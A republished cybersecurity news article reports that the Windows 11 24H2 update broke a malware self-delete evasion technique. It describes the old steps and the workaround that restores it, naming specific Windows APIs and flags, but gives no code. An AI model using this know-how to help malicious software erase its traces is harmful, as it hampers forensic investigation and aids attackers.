.jpg)
![[The AI Show Episode 151]: Anthropic CEO: AI Will Destroy 50% of Entry-Level Jobs, Veo 3’s Scary Lifelike Videos, Meta Aims to Fully Automate Ads & Perplexity’s Burning Cash](https://www.marketingaiinstitute.com/hubfs/ep%20151%20cover.png)
![[DEALS] Internxt Cloud Storage: Lifetime Subscription (85% off) & Other Deals Up To 98% Off – Offers End Soon!](https://www.javacodegeeks.com/wp-content/uploads/2012/12/jcg-logo.jpg){kind=logo}
![From electrical engineering student to CTO with Hitesh Choudhary [Podcast #175]](https://cdn.hashnode.com/res/hashnode/image/upload/v1749158756824/3996a2ad-53e5-4a8f-ab97-2c77a6f66ba3.png?#)
.jpg?width=1920&height=1920&fit=bounds&quality=70&format=jpg&auto=webp#)
.jpg?width=1920&height=1920&fit=bounds&quality=70&format=jpg&auto=webp#)
_Michael_Vi_Alamy.jpg?width=1280&auto=webp&quality=80&disable=upscale#)
![Google Messages rolls out taller, 14-line text field [U]](https://i0.wp.com/9to5google.com/wp-content/uploads/sites/4/2024/06/Google-Messages-2.jpg?resize=1200%2C628&quality=82&strip=all&ssl=1)
![Apple Planning Futuristic 'Glasswing' iPhone With Curved Glass and No Cutouts [Gurman]](https://www.iclarified.com/images/news/97534/97534/97534-640.jpg)
Windows 11 24H2 Disrupts Self-Delete Technique Used for Malware Evasion
Windows 11’s latest 24H2 update has inadvertently broken a widely-used malware evasion technique known as the Lloyd Labs self-delete method, forcing cybersecurity professionals and threat actors alike to adapt their tools and techniques for the new operating system environment. The Lloyd Labs self-delete technique has been a cornerstone method for malware developers seeking to cover […] The post Windows 11 24H2 Disrupts Self-Delete Technique Used for Malware Evasion appeared first on Cyber Security News.
Windows 11’s latest 24H2 update has inadvertently broken a widely-used malware evasion technique known as the Lloyd Labs self-delete method, forcing cybersecurity professionals and threat actors alike to adapt their tools and techniques for the new operating system environment.
The Lloyd Labs self-delete technique has been a cornerstone method for malware developers seeking to cover their tracks in contested environments.
This sophisticated approach allows malicious software to completely remove itself from a target system after execution, making forensic analysis significantly more challenging for security teams.
The technique works by manipulating Windows file system handles through a seven-step process that ultimately results in complete file deletion.
Under Windows 23H2 and earlier versions, the method operated flawlessly by first opening a file with DELETE access permissions, renaming the primary data stream, closing the handle, reopening the file, setting the deletion disposition to true, and finally closing the handle to trigger deletion. This process effectively erased all traces of the malware from the target system’s storage.
Windows 11 24H2 Disrupts Lloyd Labs’
However, TKYN investigations have revealed that Windows 11 24H2 fundamentally altered how the NTFS file system handles these deletion requests.
Instead of completely removing the file as intended, the new implementation moves the file’s contents to an alternate data stream rather than deleting it entirely.
This means that while the file appears empty to casual observation, its data actually persists on the disk, completely defeating the self-deletion purpose.
The discovery emerged when multiple researchers noticed their proof-of-concept implementations failing on 24H2 systems. Through detailed kernel debugging and reverse engineering of the NTFS.sys driver, investigators identified that Microsoft had modified the NtfsSetDispositionInfo function between the two Windows versions.
The specific failure occurs during the SetDispositionInformationFile system call, which now returns error code 0xF216D when attempting to delete memory-mapped files using the traditional technique.
To understand the root cause, researchers conducted a comparative analysis between NTFS.sys samples from both Windows versions using tools like Ghidra and WinDbg kernel debugging.
They traced the execution path to identify where the deletion logic diverged, discovering that 24H2 introduced additional security checks and modified handling procedures for file disposition operations.
The cybersecurity community has already developed workarounds for this limitation. The solution involves utilizing the FILE_DISPOSITION_POSIX_SEMANTICS flag in conjunction with the FileDispositionInformationEx information class.
This approach leverages POSIX-style deletion semantics that bypass the new restrictions implemented in 24H2’s NTFS driver.
Updated implementations now use FILE_DISPOSITION_INFORMATION_EX structures with combined FILE_DISPOSITION_DELETE and FILE_DISPOSITION_POSIX_SEMANTICS flags.
The modified technique calls NtSetInformationFile with FileDispositionInformationEx instead of the traditional FileDispositionInfo parameter, successfully achieving complete file deletion on 24H2 systems.
This development highlights the ongoing cat-and-mouse game between operating system security improvements and evasion technique evolution.
While Microsoft’s changes likely aimed to enhance system security and file handling robustness, they inadvertently exposed a widely-relied-upon technique used by both legitimate security tools and malicious software.
The rapid community response demonstrates the adaptability of modern cybersecurity research and the importance of continuous technique validation across operating system updates.
Try Next-gen Antivirus that Elevates Endpoint Protection for Free
The post Windows 11 24H2 Disrupts Self-Delete Technique Used for Malware Evasion appeared first on Cyber Security News.
